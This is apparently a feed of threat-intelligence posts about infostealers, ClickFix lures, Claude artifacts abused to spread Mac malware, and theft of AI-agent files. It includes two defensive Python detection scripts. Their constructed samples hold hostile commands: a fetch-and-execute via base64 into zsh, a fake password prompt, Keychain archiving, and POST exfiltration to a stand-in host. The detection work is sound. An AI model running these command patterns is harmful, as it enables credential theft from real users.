#BingAI promoted fake #OpenClaw #GitHub repo pushing info-stealing #malware
Command-and-control domain tree, 2026-02-19 to 2026-03-04 #InfoStealer
https://abjuri5t.github.io/SarlackLab/
*.suncrest[.]in[.]net
*.agenciadelivearte[.]com[.]br
Supply-chain worm 🪱 with its own #MCP server spreads via #GitHub | Developer https://www.heise.de/news/Lieferketten-Wurm-mit-eigenem-MCP-Server-verbreitet-sich-ueber-GitHub-11190554.html #git :git: #ShaiHulud #malware #InfoStealer
#screenshot stolen by #infostealer
"I love the smell of #screenshot stolen by #infostealer in the morning" (quote).
Hello everyone! It's been a slightly quieter 24 hours in the cyber world, but we still have some interesting developments to cover, including a peek into AI-assisted malware development and a significant data privacy gaffe. Let's dive in:
AI-Assisted Info-Stealer Experiment: Arkanix Stealer 🤖
- A new information-stealing malware, Arkanix Stealer, was promoted on dark web forums for a brief period in late 2025 before its author abruptly took it down.
- Kaspersky researchers found strong indicators of Large Language Model (LLM) involvement in its development, suggesting an experiment to rapidly build and deploy malware, potentially reducing development time and costs.
- Arkanix offered extensive data-stealing capabilities, targeting browser data, cryptocurrency wallets, VPN credentials, and gaming platforms, with a premium C++ version adding advanced features like the ChromElevator post-exploitation tool.
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/arkanix-stealer-pops-up-as-short-lived-ai-info-stealer-experiment/
Cornwall Council's Data Breach Blunder ⚠️
- Cornwall Council in the UK is facing a data breach claim after allegedly exposing the personal details of ten complainants to the subject of their complaints, Cllr Dulcie Tudor.
- Despite four individuals requesting redaction, the council's process failed, with Cllr Tudor gaining access to names, home addresses, email addresses, and phone numbers simply by opening the attached complaint files.
- This incident highlights critical flaws in the council's data handling procedures and raises concerns about compliance with data protection regulations, prompting an immediate review of how sensitive information is processed and shared.
🕵🏼 The Register | https://go.theregister.com/feed/www.theregister.com/2026/02/22/cornwall_council_complaints_breach/
#CyberSecurity #ThreatIntelligence #Malware #InfoStealer #AI #LLM #DataPrivacy #DataBreach #GDPR #InfoSec #CyberNews
Arkanix Stealer Targets Browsers via Dual Implementation
Arkanix Stealer is a MaaS infostealer with both C++ and Python implementations.
Pulse ID: 699b559757b9fda783b4d450
Pulse Link: https://otx.alienvault.com/pulse/699b559757b9fda783b4d450
Pulse Author: cryptocti
Created: 2026-02-22 19:14:31
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #CyberSecurity #InfoSec #InfoStealer #MaaS #OTX #OpenThreatExchange #Python #bot #cryptocti
CharlieKirk Credential Theft Malware Targeting Windows
CharlieKirk Grabber is a Python-based Windows infostealer that rapidly steals browser credentials
Pulse ID: 699a25c4c3fd0bde93c72263
Pulse Link: https://otx.alienvault.com/pulse/699a25c4c3fd0bde93c72263
Pulse Author: cryptocti
Created: 2026-02-21 21:38:12
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #CyberSecurity #InfoSec #InfoStealer #Malware #OTX #OpenThreatExchange #Python #Windows #bot #cryptocti
📢⚠️ New ClickFix attack uses fake CAPTCHA pages to trick users into running PowerShell malware. The infostealer targets crypto wallets, 25+ browsers, gaming accounts, and VPN data.
Read: https://hackread.com/clickfix-attack-crypto-wallets-browsers-infostealer/
Fake Homebrew Pages Deliver Cuckoo Stealer via ClickFix | macOS Threat Hunting Analysis
A sophisticated malware campaign targeting macOS users has been discovered, utilizing typosquatted domains impersonating the Homebrew package manager. The attack, dubbed ClickFix, exploits users' trust in command-line installation processes. Victims are tricked into executing malicious curl commands, leading to the deployment of a credential harvester and the Cuckoo Stealer malware. This infostealer establishes persistence through LaunchAgents, bypasses Gatekeeper, and employs encrypted C2 communication. It systematically exfiltrates sensitive data including browser credentials, cryptocurrency wallets, and system information. The campaign's infrastructure spans multiple domains hosted on shared IP addresses, indicating a coordinated and evolving threat.
Pulse ID: 69972ba35a28ae9de06a7308
Pulse Link: https://otx.alienvault.com/pulse/69972ba35a28ae9de06a7308
Pulse Author: AlienVault
Created: 2026-02-19 15:26:27
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #CyberSecurity #InfoSec #InfoStealer #Mac #MacOS #Malware #OTX #OpenThreatExchange #RAT #Rust #bot #cryptocurrency #AlienVault
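The Cuckoo Stealer pulse above says the malware persists through LaunchAgents. The following is an added example, not code from AlienVault or any vendor: a small triage script that parses LaunchAgent plists and flags the traits a hunter would look at first (RunAtLoad/KeepAlive, a program living in a temp or hidden user-writable path, or a shell one-liner that fetches or decodes its payload). The heuristics, weights and threshold are this example's own assumptions, and the three plists it runs over are constructed samples, not real indicators.

```python
"""Triage macOS LaunchAgent plists for stealer-style persistence.

Added example (not code from the AlienVault pulse or any vendor). Heuristics,
weights and threshold are assumptions; the sample plists are constructed.
"""
import plistlib
import re

# Program path in a location a stealer can write to without privileges.
WRITABLE_PATH = re.compile(r"^(/tmp/|/private/tmp/|/var/folders/|/Users/[^/]+/\.)")
# A shell one-liner that fetches, decodes or scripts its way to a payload.
FETCH_OR_DECODE = re.compile(r"\b(curl|wget|base64|osascript|nohup)\b")
SHELL_NAMES = {"sh", "bash", "zsh"}
WEIGHTS = {"run_at_load": 1, "keep_alive": 1, "program_in_writable_path": 3,
           "shell_fetch_or_decode": 3, "args_reference_tmp": 2}
THRESHOLD = 4  # assumed: one common trait alone stays below, combinations do not


def triage_plist(plist_bytes):
    """Return {'label', 'program', 'score', 'findings'} for one LaunchAgent plist."""
    d = plistlib.loads(plist_bytes)  # handles XML and binary plists
    args = list(d.get("ProgramArguments") or [])
    if not args and "Program" in d:
        args = [d["Program"]]
    findings = []
    if d.get("RunAtLoad"):
        findings.append("run_at_load")
    if d.get("KeepAlive"):
        findings.append("keep_alive")
    program = args[0] if args else ""
    if WRITABLE_PATH.match(program):
        findings.append("program_in_writable_path")
    if program.rsplit("/", 1)[-1] in SHELL_NAMES:
        # /bin/zsh -c "<command>": inspect the command, not just the shell path
        command = " ".join(args[1:])
        if FETCH_OR_DECODE.search(command):
            findings.append("shell_fetch_or_decode")
        if re.search(r"/(private/)?tmp/|/var/folders/", command):
            findings.append("args_reference_tmp")
    return {"label": d.get("Label"), "program": program,
            "score": sum(WEIGHTS[f] for f in findings), "findings": findings}


def hunt(plists, threshold=THRESHOLD):
    """Triage every plist and return those at or above threshold, highest score first."""
    results = [triage_plist(p) for p in plists]
    return sorted((r for r in results if r["score"] >= threshold),
                  key=lambda r: -r["score"])


def _plist(body):
    """Wrap a dict body in a minimal XML plist (constructed sample helper)."""
    return ('<?xml version="1.0" encoding="UTF-8"?>\n'
            '<plist version="1.0"><dict>' + body + '</dict></plist>').encode()


# Constructed samples, not real indicators. example.invalid is a reserved TLD.
SAMPLE_PLISTS = [
    # shell one-liner fetching and decoding a payload at every login
    _plist('<key>Label</key><string>com.example.update</string>'
           '<key>ProgramArguments</key><array><string>/bin/zsh</string><string>-c</string>'
           '<string>curl -fsSL https://c2.example.invalid/u | base64 -d | zsh</string></array>'
           '<key>RunAtLoad</key><true/><key>KeepAlive</key><true/>'),
    # binary dropped into a hidden directory under /private/tmp
    _plist('<key>Label</key><string>com.example.helper</string>'
           '<key>ProgramArguments</key><array><string>/private/tmp/.helper/agent</string></array>'
           '<key>RunAtLoad</key><true/>'),
    # ordinary vendor agent living under /Applications
    _plist('<key>Label</key><string>com.vendor.sync</string>'
           '<key>ProgramArguments</key><array><string>/Applications/Sync.app/Contents/MacOS/syncd</string>'
           '<string>--daemon</string></array><key>RunAtLoad</key><true/>'),
]

if __name__ == "__main__":
    import glob
    import os
    # On a Mac, triage the current user's LaunchAgents; elsewhere fall back to the samples.
    paths = glob.glob(os.path.expanduser("~/Library/LaunchAgents/*.plist"))
    plists = [open(p, "rb").read() for p in paths] or SAMPLE_PLISTS
    for r in hunt(plists):
        print(f"{r['score']:>2}  {r['label']}  {r['program']}  {', '.join(r['findings'])}")
```

A hit is a lead, not a verdict: the next step is `codesign -dv` on the flagged program and a look at the plist's modification time against the user's login and download timeline. The Gatekeeper bypass the pulse mentions is not something this check can see; it only covers the persistence artifact.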
Arkanix Stealer: a C++ & Python infostealer
A C++ and Python infostealer, dubbed Arkanix, has been developed and used by Kaspersky, a leading security firm, to spread and steal data from organisations across the globe.
Pulse ID: 6996f650827c9b89d94e32af
Pulse Link: https://otx.alienvault.com/pulse/6996f650827c9b89d94e32af
Pulse Author: CyberHunter_NL
Created: 2026-02-19 11:38:56
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #InfoSec #InfoStealer #Kaspersky #OTX #OpenThreatExchange #Python #bot #CyberHunter_NL
📢⚠️ Infostealer malware now targeting AI identity and memory files, researchers find #OpenClaw data theft exposing a user’s digital blueprint.
Read: https://hackread.com/infostealer-steal-openclaw-ai-identity-memory-files/
#Infostealer #malware found stealing #OpenClaw secrets for first time
📬 Hackers Are Literally Mailing You Scam Letters 📬
Threat actors are sending physical letters through postal mail pretending to be from Trezor and Ledger, manufacturers of cryptocurrency hardware wallets. The letters use official-looking branding and urgent language to trick recipients into revealing their wallet recovery phrases on fake websites. The scam represents a sophisticated blend of physical and digital social engineering.
Sources:
• https://www.bleepingcomputer.com/news/security/snail-mail-letters-target-trezor-and-ledger-users-in-crypto-theft-attacks/
• https://www.cryptotimes.io/2026/02/16/ledger-and-trezor-users-are-being-tricked-into-giving-away-millions/
• https://crypto.news/crypto-hackers-target-trezor-ledger-users-in-theft/
• https://phemex.com/news/article/scammers-target-ledger-and-trezor-users-with-phishing-letters-60803
#Cryptocurrency #Trezor #Ledger #PhishingScam #HardwareWallet
----------
🤖 Trusted AI Tool Weaponized to Hack Macs 🤖
Threat actors are abusing Claude AI's Artifacts feature and Google Ads in ClickFix campaigns that deliver infostealer malware to macOS users. The attacks target users searching for specific technical queries, showing malicious Google Ads that lead to Claude-generated artifacts containing malware. This represents a concerning abuse of AI-generated content for malware distribution.
Sources:
• https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/
• https://cyberpress.org/malicious-campaign-uses-claude-artifacts-and-google-ads/
• https://www.rescana.com/post/claude-llm-artifacts-exploited-to-distribute-mac-infostealer-malware-via-clickfix-attack-chain-targe
• https://www.news4hackers.com/clickfix-attack-exploits-claude-llm-artifacts-to-distribute-mac-infostealers/
#Claude #MacMalware #Infostealer #GoogleAds #AI
----------
❄️ ShinyHunters Strikes Again: 600K Records Leaked ❄️
The notorious ShinyHunters data extortion group claims to have stolen more than 600,000 Canada Goose customer records containing personal and payment-related information. Canada Goose told BleepingComputer the dataset appears to relate to past customer transactions and investigators have not found evidence of a breach of Canada Goose's own systems. The company is investigating whether the data came from a third-party vendor or partner.
Sources:
• https://www.bleepingcomputer.com/news/security/canada-goose-investigating-as-hackers-leak-600k-customer-records/
• https://securityaffairs.com/188046/data-breach/shinyhunters-leaked-600k-canada-goose-customer-records-but-the-firm-denies-it-was-breached.html
• https://www.techradar.com/pro/security/canada-goose-confirms-data-leak-around-600-000-customers-thought-to-be-affected
• https://vpncentral.com/canada-goose-600k-customer-records-leaked-shinyhunters-claims-third-party-breach/
#DataBreach #CanadaGoose #ShinyHunters #CustomerData #CyberSecurity
Infostealers now targeting AI agents.
OpenClaw configs exfiltrated:
• Gateway tokens
• Private keys
• “Soul” files
• Memory logs
Result: full AI identity compromise.
https://www.technadu.com/infostealer-evolves-to-target-ai-agents-openclaw-configurations/620246/
Are AI configs your new high-value assets?
Claude Artifacts abused to push MacSync Infostealer in ClickFix
Attackers abused public Claude artifacts and promoted them through
Google Ads to make malicious links appear legitimate in search results
Pulse ID: 69905ba50237cf43b0cadc4c
Pulse Link: https://otx.alienvault.com/pulse/69905ba50237cf43b0cadc4c
Pulse Author: cryptocti
Created: 2026-02-14 11:25:25
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #Google #InfoSec #InfoStealer #Mac #OTX #OpenThreatExchange #bot #cryptocti
ClickFix campaigns are now leveraging LLM-generated public artifacts for malware distribution.
Per Moonlock Lab and AdGuard:
• Abuse of Claude artifact pages
• Google Ads search poisoning
• Obfuscated shell execution (base64 decode → zsh)
• Second-stage loader for MacSync infostealer
• Hardcoded API key + token-protected C2
• AppleScript (osascript) handling data theft
• Archive staging at /tmp/osalogging.zip
• Multi-attempt POST exfiltration
Previous campaigns exploited ChatGPT and Grok sharing features.
LLM trust is now an operational risk vector.
Should EDR flag suspicious AI-guided shell patterns?
Engage below.
Follow @technadu for deep technical threat analysis.
#ThreatIntel #MacOSSecurity #Infostealer #C2Traffic #ClickFix #LLMSecurity #MalwareAnalysis #AppSec #BlueTeam #EDR #ThreatHunting #CyberThreats #ZeroTrust
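The post above asks whether EDR should flag the shell patterns behind these ClickFix chains (base64 decode piped into zsh, a curl fetch-and-execute, osascript handling the theft, archive staging under /tmp, POST exfiltration), and the Cuckoo Stealer pulse earlier on this page describes the same fetch-and-execute lure via fake Homebrew pages. The block below is an added example, not code from Moonlock Lab, AdGuard, technadu or any vendor: it scores process command lines against those traits, decodes embedded base64 so the hidden stage is scored too, and runs over constructed sample telemetry. The rule set, weights and threshold are this example's own assumptions; the only real URL in the samples is the genuine Homebrew installer one-liner, included to show that the same shape scores below threshold on its own.

```python
"""Score shell command lines for ClickFix-style execution chains.

Added example (not code from Moonlock Lab, AdGuard, technadu or any vendor).
Rules, weights and threshold are assumptions; sample command lines are
constructed. Feed it EDR process telemetry or a shell-history export.
"""
import base64
import re

# (name, pattern, weight). Weights are assumed and tuned so that one
# common-but-legitimate trait stays under THRESHOLD and combinations do not.
RULES = [
    # echo <blob> | base64 -d | zsh: the obfuscated stage described in the post
    ("b64_to_shell", re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(zsh|bash|sh)\b"), 5),
    ("echo_long_b64", re.compile(r"echo\s+[\"']?[A-Za-z0-9+/=]{40,}"), 2),
    # curl ... | sh and $(curl ...): fetch-and-execute, as in the fake Homebrew lure
    ("curl_to_shell", re.compile(r"\bcurl\b[^|]*\|\s*(zsh|bash|sh)\b"), 4),
    ("curl_subst", re.compile(r"\$\(\s*curl\b"), 3),
    # AppleScript handling the theft, including a fake password prompt
    ("osascript_inline", re.compile(r"\bosascript\s+-e\b"), 2),
    ("osascript_password_prompt", re.compile(r"display dialog.*(with hidden answer|default answer)"), 4),
    # archive staging under /tmp and POST-based exfiltration
    ("tmp_archive", re.compile(r"/tmp/[^\s'\"]+\.zip\b"), 2),
    ("curl_post", re.compile(r"\bcurl\b.*(-X\s*POST|--data|-F\s|-d\s)"), 3),
]
THRESHOLD = 5
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


def decode_blobs(cmdline):
    """Best-effort decode of every long base64 run in cmdline into text."""
    decoded = []
    for m in B64_BLOB.finditer(cmdline):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except ValueError:  # binascii.Error and UnicodeDecodeError both subclass ValueError
            continue
        if all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def triage(cmdline, depth=0):
    """Return (score, hits) for one command line; decoded base64 stages are scored too."""
    score, hits = 0, []
    for name, rx, weight in RULES:
        if rx.search(cmdline):
            score += weight
            hits.append(name)
    if depth == 0:  # one level of decoding covers the echo | base64 -d | zsh chain
        for inner in decode_blobs(cmdline):
            inner_score, inner_hits = triage(inner, depth=1)
            score += inner_score
            hits.extend("decoded:" + h for h in inner_hits)
    return score, hits


def scan(cmdlines, threshold=THRESHOLD):
    """Return [(score, hits, cmdline)] at or above threshold, highest score first."""
    flagged = []
    for cmd in cmdlines:
        score, hits = triage(cmd)
        if score >= threshold:
            flagged.append((score, hits, cmd))
    return sorted(flagged, key=lambda t: -t[0])


# Constructed sample telemetry, not real indicators. example.invalid is a reserved TLD.
_INNER = "curl -fsSL https://brew.example.invalid/install.sh | zsh"
_BLOB = base64.b64encode(_INNER.encode()).decode()
SAMPLE_CMDLINES = [
    f'echo "{_BLOB}" | base64 -d | zsh',
    "osascript -e 'display dialog \"Password required\" default answer \"\" with hidden answer'"
    " && zip -r /tmp/osalogging.zip ~/Library/Keychains",
    "curl -s -X POST --data-binary @/tmp/osalogging.zip https://c2.example.invalid/upload",
    # the genuine Homebrew one-liner: same fetch-and-execute shape, scores below threshold
    '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    "git status",
    "base64 -d < notes.b64 > notes.txt",
]

if __name__ == "__main__":
    for score, hits, cmd in scan(SAMPLE_CMDLINES):
        print(f"{score:>3}  {', '.join(hits)}\n     {cmd}")
```

The decoding step is what makes the first sample light up: the outer line only shows an echo into base64, but the decoded stage is a curl-into-zsh fetch, which is exactly the shape of the fake Homebrew lure. The real Homebrew installer scores 3 on `$(curl ...)` alone, which is the caveat for anyone turning this into a detection rule: the command shape cannot separate the typosquat from the genuine page, so the source domain (an allow-list for the installer host, or a reputation lookup on anything else) has to be the deciding signal.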
Once-hobbled Lumma Stealer is back with lures that are hard to resist https://arstechni.ca/9U5H #castleloader #infostealer #Security #clickfix #malware #Biz&IT #lumma